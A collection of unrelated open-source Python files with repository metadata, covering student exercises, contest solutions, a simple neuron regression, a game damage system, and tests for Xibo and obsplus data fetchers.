range(N):\n dfs(num_list[idx], idx)\n\nprint(answer)\n","repo_name":"Challenge-Next-Level/Floyd-Warshall","sub_path":"LeeYooseok/BOJ_오늘의 문제/2023-03-25/1182 부분수열의 합.py","file_name":"1182 부분수열의 
합.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"19567305919","text":"# Celsius to Fahrenheit and vice versa\r\nimport operator\r\n\r\ndef c_to_f(the_temp):\r\n the_temp *= 9/5\r\n the_temp += 32\r\n return the_temp\r\n \r\ndef f_to_c(the_temp):\r\n the_temp -= 32\r\n the_temp *= 5/9\r\n return the_temp\r\n\r\ndef k_to_c_back(temp, the_op):\r\n ans = the_op(temp, 273.15)\r\n return ans\r\n \r\ndef k_to_f(temp): \r\n temp_in_f = 9/5 * (temp - 273) + 32\r\n return temp_in_f\r\n \r\nfinish = False \r\nprint (\"This is the Temperature Converter!\")\r\n\r\nwhile finish == False:\r\n print ()\r\n to_convert = input(\"Enter what type of temperature you want to convert ('c' for celsius, 'f' for fahrenheit and 'k' for kelvin): \").lower()\r\n to_make = input(\"Enter what you want to convert the above type to: \").lower() \r\n if to_convert == to_make:\r\n print (\"You entered the same thing. Please try again.\")\r\n continue\r\n \r\n temp_to_change = input(\"Enter the temperature you wish to convert, or press ENTER to exit: \")\r\n if temp_to_change == \"\":\r\n print (\"\\nGame Over!\")\r\n finish = True\r\n \r\n else:\r\n try:\r\n val = float(temp_to_change)\r\n except ValueError:\r\n print (\"\\nPlease enter a number only.\") \r\n continue\r\n \r\n print () \r\n if (to_convert == \"k\" or to_convert == \"kelvin\") and (to_make == \"f\" or to_make == \"fahrenheit\"):\r\n print (str(temp_to_change) + \" Kelvin converts to \" + str(c_to_f(k_to_c_back(float(temp_to_change), operator.sub))) + \"°F.\")\r\n \r\n elif (to_convert == \"k\" or to_convert == \"kelvin\") and (to_make == \"c\" or to_make == \"celsius\"):\r\n print (str(temp_to_change) + \" Kelvin converts to \" + str(k_to_c_back(float(temp_to_change), operator.sub)) + \"°C.\")\r\n \r\n elif (to_convert == \"f\" or to_convert == \"fahrenheit\") and (to_make == \"k\" or to_make == \"kelvin\"):\r\n print (str(temp_to_change) + \"°F converts to \" + str(k_to_c_back(f_to_c(float(temp_to_change)), operator.add)) + \" Kelvin.\")\r\n \r\n elif (to_convert == \"f\" or to_convert == \"fahrenheit\") and (to_make == \"c\" or to_make == \"celsius\"):\r\n print (str(temp_to_change) + \"°F converts to \" + str(f_to_c(float(temp_to_change))) + \"°C.\")\r\n \r\n elif (to_convert == \"c\" or to_convert == \"celsius\") and (to_make == \"k\" or to_make == \"kelvin\"):\r\n print (str(temp_to_change) + \"°C converts to \" + str(k_to_c_back(float(temp_to_change), operator.add)) + \" Kelvin.\")\r\n \r\n elif (to_convert == \"c\" or to_convert == \"celsius\") and (to_make == \"f\" or to_make == \"fahrenheit\"):\r\n print (str(temp_to_change) + \"°C converts to \" + str(c_to_f(float(temp_to_change))) + \"°F.\") \r\n \r\n else:\r\n print (\"I can't understand what you entered. Please try again.\") ","repo_name":"tanmay2004/Math-Programs","sub_path":"The Temperature Converter.py","file_name":"The Temperature Converter.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31400083297","text":"\"\"\"\r\nЗадание:\r\nНайти подходящие данные для подобной задачи\r\n\r\n1. Загрузить их в pandas.\r\n2. Шкалировать для совместимости с ИНС.\r\n3. 
Сравнить результат \"до\" и \"после\".\r\n---------------------------------------------------------\r\nДанные содержатся в файле data.xlsx\r\nДанные составлены вручную с сайта https://perm.vseinstrumenti.ru/\r\nТема: электрические энергосберегающие лампы\r\n\r\nТаблица содержит следующие колонки:\r\n- № поз.\r\n- Наименование\r\n- Производитель\r\n- Мощность, Вт\r\n- Световой поток, Лм\r\n- Длина, мм\r\n- Диаметр, мм\r\n- Цветопередача, Ra\r\n- Срок службы, ч\r\n- Цветовая температура, К\r\n- Стоимость единицы, руб.\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn import preprocessing\r\n\r\ndata = pd.ExcelFile(\"data.xlsx\")\r\ndata_parse = data.parse('Лист1')\r\ndata_frame = pd.DataFrame(data_parse)\r\n\r\n\"\"\"\r\nОбучающий вектор примем колонку \"Мощность, Вт\"\r\nВ качестве данных:\r\n- Световой поток, Лм\r\n- Длина, мм\r\n- Диаметр, мм\r\n- Срок службы, ч\r\n- Цветовая температура, К\r\n- Стоимость единицы, руб.\r\nP.S. Цветопередачу не стал брать, ибо значение почти везде одно и то же\r\n\"\"\"\r\n\r\nvalues = np.hstack((data_frame.values[2:, 4:7], data_frame.values[2:, 8:11]))\r\n# Нормализуем данные по столбцам, используя библиотеку sklearn:\r\nlearn_array = preprocessing.normalize(values, axis=0, norm='max')\r\n# Желаемый результат:\r\noutput_values = data_frame.values[2:, 3:4].flatten()\r\n\r\n\r\n# Производим \"обучение\" нейрона по имеющимся данным:\r\nw = np.zeros(len(learn_array[0]))\r\n\r\nalfa = 0.2\r\nbetta = -0.4\r\n\r\n\r\ndef f(x):\r\n s = betta + np.sum(x @ w)\r\n return s\r\n\r\n\r\ndef train():\r\n global w\r\n w_copy = w.copy()\r\n for x, y in zip(learn_array, output_values):\r\n w += alfa * (y - f(x)) * x\r\n return (w != w_copy).any()\r\n\r\n\r\nwhile train():\r\n pass\r\n\r\n\r\nfor i in range(len(learn_array)):\r\n if i == 0:\r\n print(\"Желаемое значение -> полученное значение: расхождение значений (в %)\")\r\n r = round(f(learn_array[i]), 3)\r\n a = output_values[i]\r\n d = round(abs(a - r)*100/max(r, a), 2)\r\n print(f'{a} -> {r}: {d}%')\r\n\r\n\"\"\"\r\nЖелаемое значение -> полученное значение: расхождение значений (в %)\r\n15 -> 13.920: 7.2%\r\n11 -> 11.769: 6.53%\r\n20 -> 17.953: 10.24%\r\n7 -> 7.085: 1.2%\r\n15 -> 15.108: 0.71%\r\n7 -> 6.267: 10.47%\r\n13 -> 13.404: 3.01%\r\n11 -> 10.780: 2.0%\r\n13 -> 14.723: 11.7%\r\n20 -> 18.207: 8.96%\r\n5 -> 5.896: 15.2%\r\n10 -> 10.667: 6.25%\r\n8 -> 8.762: 8.7%\r\n12 -> 12.288: 2.34%\r\n10 -> 8.912: 10.88%\r\n8 -> 6.061: 24.24%\r\n12 -> 12.667: 5.27%\r\n20 -> 20.006: 0.03%\r\n15 -> 14.844: 1.04%\r\n13 -> 12.011: 7.61%\r\n13 -> 13.332: 2.49%\r\n5 -> 5.933: 15.73%\r\n8 -> 7.543: 5.71%\r\n8 -> 7.544: 5.7%\r\n20 -> 19.850: 0.75%\r\n15 -> 13.255: 11.63%\r\n15 -> 16.032: 6.44%\r\n\"\"\"\r\n\r\n\r\n# Протестируем наш нейрон, используя новые данные:\r\ndata_test = pd.ExcelFile(\"data_test.xlsx\")\r\ndata_test_parse = data_test.parse('Лист1')\r\ndata_test_frame = pd.DataFrame(data_test_parse)\r\n\r\nvalues_test = np.hstack((data_test_frame.values[2:, 4:7], data_test_frame.values[2:, 8:11]))\r\ntest_array = preprocessing.normalize(values_test, axis=0, norm='max')\r\noutput_values_test = data_test_frame.values[2:, 3:4].flatten()\r\n\r\nfor i in range(len(test_array)):\r\n if i == 0:\r\n print(\"Желаемое значение -> полученное значение: расхождение значений (в %)\")\r\n r = round(f(test_array[i]), 3)\r\n a = output_values_test[i]\r\n d = round(abs(a - r)*100/max(r, a), 2)\r\n print(f'{a} -> {r}: {d}%')\r\n\r\n\"\"\"\r\nЖелаемое значение -> полученное значение: расхождение значений (в %)\r\n11 -> 15.595: 
29.46%\r\n7 -> 8.731: 19.83%\r\n12 -> 18.678: 35.75%\r\n10 -> 14.562: 31.33%\r\n15 -> 18.972: 20.94%\r\n\"\"\"\r\n\r\n\r\n\"\"\"\r\nВЫВОД: \r\nПо началу, когда нейрон \"обучали\", получалось не слишком большое расхождение по сравнению с тестируемыми \r\nданными. Причины таких больших расхождений: \r\n- недостаточное количество данных (для реальной картины нужны данные хотя \r\n бы по 10-15 позиций на каждую мощность); \r\n- недостоверные данные в одном из показателе - цене (в связи с тем, \r\n что сейчас в самом разгаре \"черная пятница\", цены на некоторые позиции могут значительно снижать);\r\n- отсутствие какой-либо корреляции (зависимости) между характеристиками продукта;\r\n- недостаточное количество характеристик продукта (в нашем случае использованы только 6 характеристик \r\n продукта, по факту, их гораздо больше (вес, производитель, напряжение, вид, тип колбы, форма, \r\n эквивалент лампы накаливания, угол рассеивания и пр.)\r\n\"\"\"\r\n","repo_name":"Alekssanderson/Python_AAT22-1","sub_path":"class_5/class_5.py","file_name":"class_5.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12708723207","text":"from config import config\nfrom character import characters\nfrom damaging import damagers\nfrom boundingbox import bounding_boxes\nfrom boundingboxsystem import overlaps\n\n'''Place containables in character inventory upon collision.'''\n\n\ndef update_character_damager_collisions(lapsed_milliseconds: int):\n for char_entity in characters.keys():\n # iterate over containables that are on the map\n for damaging_entity in damagers.keys():\n if overlaps(\n bounding_boxes[char_entity],\n bounding_boxes[damaging_entity]\n ):\n # deal damage to the character\n\n characters[char_entity].health = max(\n 0,\n characters[char_entity].health\n - (lapsed_milliseconds * damagers[damaging_entity].damage_per_ms)\n )\n","repo_name":"MattEttler/worlds-above","sub_path":"python3/systems/characterdamagingcollisionsystem.py","file_name":"characterdamagingcollisionsystem.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4878996522","text":"import sys\n\ndef reconstruction(k_strings):\n\trecon = []\n\t\n\tfor element in k_strings:\n\t\trecon.append(element[0])\n\n\tpat = k_strings[len(k_strings) - 1]\n\trecon.append(pat[1:])\n\trecon = \"\".join(str(x) for x in recon)\n\treturn recon\n\ndef stringSpelledGapPat(first,second,k,d):\n\tprefix = reconstruction(first)\n\tsuffix = reconstruction(second)\n\n\tfor i in range(k+d+1, len(prefix)):\n\t\tif prefix[i] != suffix[i-k-d]:\n\t\t\treturn \"No string!\"\n\treturn prefix + suffix[len(suffix) - k-d:]\n\n\nfilename = sys.argv[1]\n\npatternA = []\npatternB = []\nwith open(filename) as file:\n\tfor line in file:\n\t\ttoAdd = line.split('|')[0]\n\t\ttoAdd2 = line.split('|')[1].rstrip()\n\t\t\n\t\tpatternA.append(toAdd)\n\t\tpatternB.append(toAdd2)\n\nresult = stringSpelledGapPat(patternA, patternB,50,200)\nprint(\"\".join(str(x) for x in result))","repo_name":"j2moreno/Beng-181","sub_path":"reconGapped.py","file_name":"reconGapped.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"20899727474","text":"class Matrix:\n def __init__(self, data):\n self.elements = data\n self.n_rows = len(data)\n self.n_columns = len(data[0])\n\n def add(self, 
other_matrix):\n result = []\n\n for row in range(self.n_rows):\n new_row = []\n\n for col in range(self.n_columns):\n result_sum = self.elements[row][col] + other_matrix.elements[row][col]\n new_row.append(result_sum)\n\n result.append(new_row)\n\n return result\n","repo_name":"zsvizi/modelling-courses","sub_path":"courses/dynamical_models/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"30777692529","text":"\"\"\"\r\nTianyi Li\r\nClass: CS 521 - Summer 2\r\nDate: 10 August 2021\r\nHomework Problem # 4\r\nDescription of Problem : Prompt for a file name of text words.\\\r\nWords can be on many lines with multiple words per line.\r\n\"\"\" \r\nimport string\r\n\r\n# The text file must be in the same file path as the main program.\r\ndef list_to_once_words(lst):\r\n \"\"\"\r\n This function will return the words that appear twice in the list.\r\n\r\n :param list:\r\n :return new_list: new list with words that appeared twice in list.\r\n \"\"\"\r\n new_list = []\r\n\r\n for char in list:\r\n if list.count(char) == 2 and char not in new_list:\r\n new_list.append(char)\r\n return new_list\r\n\r\nfile_name = input(\"Please enter the file name: \")\r\n\r\ntry:\r\n f1 = open(file_name, 'r')\r\n text = f1.read().strip()\r\n new_content = ''.join([i for i in text if i not in string.punctuation])\r\n f1.close()\r\n \r\n list = new_content.split()\r\n result = list_to_once_words(list)\r\n\r\n print(result,\"These words appeared twice in the file.\")\r\n\r\nexcept FileNotFoundError as e:\r\n print(e)\r\n","repo_name":"skyfall823/Python-Homework","sub_path":"Assignment_5/lit_hw_5_8_4.py","file_name":"lit_hw_5_8_4.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26043114896","text":"import os\n\nimport yaml\n\nfrom block_extractor.block_extractor_psl_v2 import BlockExtractorPSLV2\nfrom cell_classifier.psl_cell_classifier import PSLCellClassifier\nfrom data_loader.load_majid_data import LoadCell2VecData\n\n\ndef main(config):\n data_loader = LoadCell2VecData(config['jl_path'])\n data_loader.load_data_from_sheet('/Users/informationist/Projects/src/github.com/abhinav-kumar-thakur/table-understanding/files/AMIS_Data.xls', config)\n\n sheet_list = data_loader.tables\n\n result_path = os.path.join(config[\"model_path\"], config[\"dataset\"])\n model_path = os.path.join(result_path, config[\"c2v\"][\"cell_classifier_model_file\"] + '0' + \".model\")\n cell_classifier = PSLCellClassifier(model_path, config)\n c2v_tags = cell_classifier.classify_cells_all_tables(sheet_list)\n\n be_model_file = os.path.join(result_path, config[\"c2v\"][\"block_extractor_model_file\"] + '0' + \".model\")\n extractor = BlockExtractorPSLV2(be_model_file, config, beta=0.01, lmd=10)\n sheet_with_blocks = extractor.extract_blocks_all_tables(sheet_list, c2v_tags)\n\n for count, sheet in enumerate(sheet_with_blocks):\n print('--------------------------------------------------------------')\n print(count)\n print('--------------------------------------------------------------')\n for i, blk in enumerate(sheet):\n print(i, blk)\n\n\nif __name__ == \"__main__\":\n with open('./cfg/test_config.yaml') as ymlfile:\n c = yaml.load(ymlfile)\n\n 
main(c)\n","repo_name":"abhinav-kumar-thakur/table-understanding","sub_path":"pipeline_final.py","file_name":"pipeline_final.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33374161140","text":"#!/usr/bin/python3\ndef list_division(my_list_1, my_list_2, list_length):\n try:\n res = [i / j for i, j in zip(my_list_1, my_list_2)]\n except ZeroDivisionError:\n print(\"division by 0\")\n #return result\n except (TypeError, ValueError):\n print(\"wrong type\")\n except IndexError:\n print(\"out of range\")\n finally:\n print(res)\n return res\n","repo_name":"AishaKhalfan/alx-higher_level_programming","sub_path":"0x05-python-exceptions/4-division.py","file_name":"4-division.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"32953523147","text":"from pprint import pprint\n\nn = int(input())\ndata = []\nkey = 3\nfor _ in range(n-2):\n row = list(map(int, input().split()))\n row.append(key)\n row.append(max(row[1:-1]))\n\n data.append(row)\n key += 1\n\ndata.sort(key=lambda x: x[-1])\ning_amount = {key: None for key in range(3, n + 1)}\nprint(data)\n\nfor value in data:\n key = value[-2]\n link = value[-1]\n\n sum_A, sum_B = 0, 0\n wrong = False\n for i in value[1:-2]:\n if i == 1:\n sum_A += 1\n elif i == 2:\n sum_B += 1\n else:\n content = ing_amount.get(i, None)\n if content is None:\n wrong = True\n break\n\n sum_A += content[0]\n sum_B += content[1]\n\n if wrong:\n ing_amount[key] = None\n else:\n ing_amount[key] = sum_A, sum_B\n\npprint(ing_amount)\n\nq = int(input())\nrez = []\nfor _ in range(q):\n row = list(map(int, input().split()))\n ing_A = row[0]\n ing_B = row[1]\n key = row[2]\n content = ing_amount.get(key)\n if content is None:\n rez.append('0')\n continue\n\n if content[0] <= ing_A and content[1] <= ing_B:\n rez.append('1')\n else:\n rez.append('0')\n\nprint(''.join(rez))\n\n","repo_name":"26remph/algorithms","sub_path":"ya_intership/2022/E/E_alchemy.py","file_name":"E_alchemy.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"40775281965","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : Rock Wayne \n# @Created : 2020-06-19 08:00:00\n# @Last Modified : 2020-06-19 08:00:00\n# @Mail : lostlorder@gmail.com\n# @Version : alpha-1.0\n\n\"\"\"\n# 某种外星语也使用英文小写字母,但可能顺序 order 不同。字母表的顺序(order)是一些小写字母的排列。 \n# \n# 给定一组用外星语书写的单词 words,以及其字母表的顺序 order,只有当给定的单词在这种外星语中按字典序排列时,返回 true;否则,返回 fals\n# e。 \n# \n# \n# \n# 示例 1: \n# \n# 输入:words = [\"hello\",\"leetcode\"], order = \"hlabcdefgijkmnopqrstuvwxyz\"\n# 输出:true\n# 解释:在该语言的字母表中,'h' 位于 'l' 之前,所以单词序列是按字典序排列的。 \n# \n# 示例 2: \n# \n# 输入:words = [\"word\",\"world\",\"row\"], order = \"worldabcefghijkmnpqstuvxyz\"\n# 输出:false\n# 解释:在该语言的字母表中,'d' 位于 'l' 之后,那么 words[0] > words[1],因此单词序列不是按字典序排列的。 \n# \n# 示例 3: \n# \n# 输入:words = [\"apple\",\"app\"], order = \"abcdefghijklmnopqrstuvwxyz\"\n# 输出:false\n# 解释:当前三个字符 \"app\" 匹配时,第二个字符串相对短一些,然后根据词典编纂规则 \"apple\" > \"app\",因为 'l' > '∅',其中 '∅'\n# 是空白字符,定义为比任何其他字符都小(更多信息)。\n# \n# \n# \n# \n# 提示: \n# \n# \n# 1 <= words.length <= 100 \n# 1 <= words[i].length <= 20 \n# order.length == 26 \n# 在 words[i] 和 order 中的所有字符都是英文小写字母。 \n# \n# Related Topics 哈希表\n\n\"\"\"\n\nfrom typing import List\n\nimport pytest\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass 
Solution:\n def isAlienSorted(self, words: List[str], order: str) -> bool:\n order_dict = {char: idx for idx, char in enumerate(order)}\n sorted_list = sorted(words, key=lambda x: tuple(map(order_dict.get, x)))\n return sorted_list == words\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\n@pytest.mark.parametrize(\"kw,expected\", [\n [dict(words=[\"hello\", \"leetcode\"], order=\"hlabcdefgijkmnopqrstuvwxyz\"), True],\n [dict(words=[\"word\", \"world\", \"row\"], order=\"worldabcefghijkmnpqstuvxyz\"), False],\n [dict(words=[\"apple\", \"app\"], order=\"abcdefghijklmnopqrstuvwxyz\"), False],\n])\ndef test_solutions(kw, expected):\n assert Solution().isAlienSorted(**kw) == expected\n\n\nif __name__ == '__main__':\n pytest.main([\"-q\", \"--color=yes\", \"--capture=no\", __file__])\n","repo_name":"Wang-Yann/LeetCodeMe","sub_path":"python/_0501_1000/0953_verifying-an-alien-dictionary.py","file_name":"0953_verifying-an-alien-dictionary.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7640190148","text":"\"\"\"Finding Xibo dataset IDs.\"\"\"\n\nfrom meetup2xibo.updater.xibo_api import XiboApi\nfrom meetup2xibo.updater.xibo_dataset_id_finder import XiboDatasetIdFinder\nfrom meetup2xibo.updater.exceptions import DatasetDiscoveryError\nimport json\nimport os\nimport pytest\n\n\nSAMPLE_JSON_EMPTY_LIST = json.loads(\"\"\"[]\"\"\")\n\nSAMPLE_DATASET_JSON = json.loads(\"\"\"[\n {\n \"code\": \"novalabsschedule\",\n \"dataSet\": \"Nova Labs Schedule\",\n \"dataSetId\": 456,\n \"description\": \"Meetings, classes, and events from Meetup\"\n }\n]\"\"\")\n\nSAMPLE_DATASET_JSON_TOO_MANY = json.loads(\"\"\"[\n {\n \"code\": \"novalabsschedule\",\n \"dataSet\": \"Nova Labs Schedule\",\n \"dataSetId\": 456,\n \"description\": \"Meetings, classes, and events from Meetup\"\n },\n {\n \"code\": \"novalabsschedule\",\n \"dataSet\": \"Nova Labs Schedule Experimental\",\n \"dataSetId\": 789,\n \"description\": \"Meetings, classes, and events from Meetup\"\n }\n]\"\"\")\n\n\ndef test_discover_dataset_id(mocker):\n \"\"\"Testing getting the dataset ID.\"\"\"\n xibo_api = mocker.Mock()\n xibo_api.get_datasets_by_code = mocker.Mock(return_value = SAMPLE_DATASET_JSON)\n finder = XiboDatasetIdFinder(xibo_api)\n assert finder.find_dataset_id(\"novalabsschedule\") == 456\n xibo_api.get_datasets_by_code.assert_called_once_with(\"novalabsschedule\")\n\ndef test_discover_dataset_id_none(mocker):\n \"\"\"Testing getting the dataset ID when there are none.\"\"\"\n xibo_api = mocker.Mock()\n xibo_api.get_datasets_by_code = mocker.Mock(\n return_value = SAMPLE_JSON_EMPTY_LIST)\n finder = XiboDatasetIdFinder(xibo_api)\n try:\n dataset_id = finder.find_dataset_id(\"novalabsschedule\")\n pytest.fail('Should not find dataset_id {} for code \"novalabsschedule\"'.format(str(dataset_id)))\n except DatasetDiscoveryError as err:\n assert str(err) == 'No Xibo datasets had code \"novalabsschedule\"'\n\ndef test_discover_dataset_id_too_many(mocker):\n \"\"\"Testing getting the dataset ID when there are too many.\"\"\"\n xibo_api = mocker.Mock()\n xibo_api.get_datasets_by_code = mocker.Mock(\n return_value = SAMPLE_DATASET_JSON_TOO_MANY)\n finder = XiboDatasetIdFinder(xibo_api)\n try:\n dataset_id = finder.find_dataset_id(\"novalabsschedule\")\n pytest.fail('Should not find dataset_id {} for code \"novalabsschedule\"'.format(str(dataset_id)))\n except DatasetDiscoveryError as err:\n assert str(err) == \"2 Xibo 
datasets had code novalabsschedule: Nova Labs Schedule (456),Nova Labs Schedule Experimental (789)\"\n\n\n\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4 autoindent\n","repo_name":"jshprentz/meetup2xibo","sub_path":"tests/updater/test_xibo_dataset_id_finder.py","file_name":"test_xibo_dataset_id_finder.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"74227323972","text":"\"\"\"\ntests for the data fetcher capabilities\n\"\"\"\nimport copy\n\nimport numpy as np\nimport obspy\nimport pandas as pd\nimport pytest\nfrom obspy.core.event import Event, Origin\n\nimport obsplus\nfrom obsplus import Fetcher, WaveBank, stations_to_df, get_reference_time\nfrom obsplus.datasets.dataset import DataSet\nfrom obsplus.utils.misc import suppress_warnings, register_func\nfrom obsplus.utils.stations import df_to_inventory\nfrom obsplus.utils.testing import assert_streams_almost_equal\nfrom obsplus.utils.time import to_utc\n\nWAVEFETCHERS = []\n\n\n# ---------------------------- class level fixtures\n\n\ndef processor(st):\n \"\"\"simple processor to apply bandpass filter\"\"\"\n # mark that the processor ran\n for tr in st:\n tr.stats[\"processor_ran\"] = True\n return st\n\n\n@pytest.fixture(scope=\"session\")\n@register_func(WAVEFETCHERS)\ndef bing_fetcher():\n \"\"\"init a waveform fetcher passing a path to a directory as the arg\"\"\"\n return obsplus.load_dataset(\"bingham_test\").get_fetcher()\n\n\n@pytest.fixture(scope=\"session\")\n@register_func(WAVEFETCHERS)\ndef ta_fetcher(ta_dataset):\n \"\"\"\n Init a waveform fetcher using an active obspy client and the ta_test stations.\n \"\"\"\n return ta_dataset.get_fetcher()\n\n\n@pytest.fixture(scope=\"session\")\n@register_func(WAVEFETCHERS)\ndef subbing_fetcher_with_processor(bingham_dataset):\n \"\"\"A fetcher with a stream_processor, only use last event of bingham_test.\"\"\"\n dataset = bingham_dataset\n events = dataset.event_client.get_events()[-1]\n fetcher = Fetcher(\n waveforms=dataset.waveform_client.get_waveforms(),\n events=events,\n stations=dataset.station_client.get_stations(),\n stream_processor=processor,\n )\n return fetcher\n\n\n@pytest.fixture(scope=\"session\")\n@register_func(WAVEFETCHERS)\ndef ta_fetcher_with_processor(ta_dataset):\n \"\"\"The ta_test fetcher with a stream_processor\"\"\"\n fetcher = Fetcher(\n waveforms=ta_dataset.waveform_client.get_waveforms(),\n events=ta_dataset.event_client.get_events(),\n stations=ta_dataset.station_client.get_stations(),\n stream_processor=processor,\n )\n return fetcher\n\n\n@pytest.fixture(scope=\"class\")\ndef bing_first_time(bingham_dataset):\n \"\"\"Get a new time based on the first event in bingham_test event + 1\"\"\"\n df = obsplus.events_to_df(bingham_dataset.event_client.get_events())\n return to_utc(df.iloc[0][\"time\"])\n\n\n@pytest.fixture(scope=\"session\")\ndef ta_time_range(ta_wavebank):\n \"\"\"return a tuple of time from ta_test bank.\"\"\"\n df = ta_wavebank.read_index()\n t1 = to_utc(df[\"starttime\"].min()) + 3600\n # move to nearest hour\n start = to_utc(t1.timestamp - t1.timestamp % 3600)\n end = start + 3600 * 6\n return to_utc(start), to_utc(end)\n\n\ndef test_gather(bing_fetcher, ta_fetcher, subbing_fetcher_with_processor):\n \"\"\"Simply gather aggregated fixtures so they are marked as used.\"\"\"\n\n\n# ---------------------------------- tests\n\n\nclass TestGeneric:\n \"\"\"generic tests for wavefetchers, mostly just to make sure they run\"\"\"\n\n 
important_attrs = [\"yield\"]\n other_attrs = [\"time_before\", \"time_after\"]\n\n # fixtures\n @pytest.fixture(scope=\"session\", params=WAVEFETCHERS)\n def wavefetcher(self, request):\n \"\"\"Return a fetcher from a list of fetchers\"\"\"\n return request.getfixturevalue(request.param)\n\n @pytest.fixture(scope=\"session\")\n def copied_fetcher(self, wavefetcher):\n \"\"\"init a wavefetcher from a wavefetcher, return tuple of both\"\"\"\n return (wavefetcher, Fetcher(wavefetcher))\n\n # general tests\n def test_has_attrs(self, wavefetcher):\n \"\"\"test that streams for each event can be yielded\"\"\"\n assert hasattr(wavefetcher, \"yield_event_waveforms\")\n\n def test_copied_wavefetchers_get_same_data(self, copied_fetcher):\n \"\"\"ensure the two wavefetchers are equal\"\"\"\n wf1, wf2 = copied_fetcher\n inv_df = wf1.station_df\n start = inv_df.start_date.min()\n end = start + np.timedelta64(15, \"s\")\n # ensure the same data is returned\n ew1 = wf1.get_waveforms(starttime=start, endtime=end)\n ew2 = wf2.get_waveforms(starttime=start, endtime=end)\n assert ew1 == ew2\n\n def test_init_with_banks(self, bingham_dataset):\n \"\"\"Ensure the fetcher can be init'ed with all bank inputs.\"\"\"\n wbank = obsplus.WaveBank(bingham_dataset.waveform_path).update_index()\n ebank = obsplus.EventBank(bingham_dataset.event_path).update_index()\n sbank = bingham_dataset.station_client\n # ignore warnings (endtimes of inv are out of range)\n with suppress_warnings():\n fetcher = Fetcher(waveforms=wbank, events=ebank, stations=sbank)\n edf = fetcher.event_df\n sdf = fetcher.station_df\n for df in [edf, sdf]:\n assert isinstance(df, pd.DataFrame)\n assert not df.empty\n\n def test_set_stations_on_events(self, bingham_dataset, monkeypatch):\n \"\"\"Ensure station info can be obtained from events if needed.\"\"\"\n fetcher = bingham_dataset.get_fetcher()\n monkeypatch.setattr(fetcher, \"waveform_client\", None)\n monkeypatch.setattr(fetcher, \"station_client\", None)\n fetcher.set_stations(None)\n assert not fetcher.station_df.empty\n\n def test_failed_stations_on_events(self, bingham_dataset, monkeypatch):\n \"\"\"Ensure station info can be obtained from events if needed.\"\"\"\n fetcher = bingham_dataset.get_fetcher()\n monkeypatch.setattr(fetcher, \"waveform_client\", None)\n monkeypatch.setattr(fetcher, \"station_client\", None)\n monkeypatch.setattr(fetcher, \"event_client\", None)\n fetcher.set_stations(None)\n assert fetcher.station_df is None\n\n\nclass TestGetWaveforms:\n \"\"\"tests for getting streams from the fetcher\"\"\"\n\n duration = 10\n generic_streams = []\n\n # fixtures\n @pytest.fixture(scope=\"session\")\n @register_func(generic_streams)\n def bing_stream(self, bing_fetcher):\n \"\"\"\n Using the bing fetcher, return a data waveforms returned by get_waveforms.\n \"\"\"\n starttime = bing_fetcher.event_client.get_events()[0].origins[0].time - 2\n kwargs = dict(starttime=starttime, endtime=starttime + self.duration)\n return bing_fetcher.get_waveforms(**kwargs)\n\n @pytest.fixture(scope=\"session\")\n @register_func(generic_streams)\n def bing_stream_processed(self, subbing_fetcher_with_processor):\n \"\"\"\n Using the bing fetcher, return a data waveforms returned by get_waveforms.\n \"\"\"\n cat = subbing_fetcher_with_processor.event_client.get_events()\n starttime = cat[0].origins[0].time - 2\n fetch = subbing_fetcher_with_processor\n kwargs = dict(starttime=starttime, endtime=starttime + self.duration)\n return fetch.get_waveforms(**kwargs)\n\n @pytest.fixture(scope=\"session\")\n 
@register_func(generic_streams)\n def ta_stream(self, ta_fetcher):\n \"\"\"using the ta_fetcher and get_waveforms, return a data waveforms\"\"\"\n starttime = obspy.UTCDateTime(\"2007-02-20\")\n kwargs = dict(starttime=starttime, endtime=starttime + self.duration)\n try:\n return ta_fetcher.get_waveforms(**kwargs)\n except obspy.clients.fdsn.header.FDSNException:\n pytest.skip(\"failed to communicate with IRIS\")\n\n @pytest.fixture(scope=\"session\", params=generic_streams)\n def stream(self, request):\n \"\"\"\n A meta fixture for collecting all streams to perform common test on.\n \"\"\"\n return request.getfixturevalue(request.param)\n\n # general waveforms tests tests\n def test_gather(self, bing_stream, bing_stream_processed, ta_stream):\n \"\"\"Simply gather aggregated fixtures so they are marked as used.\"\"\"\n\n def test_streams_basics(self, stream):\n \"\"\"ensure a non-empty waveforms was returned\"\"\"\n assert isinstance(stream, obspy.Stream)\n assert len(stream)\n\n def test_stream_durations(self, stream):\n \"\"\"\n Ensure a waveforms of the correct length (under 2 samples)\n was 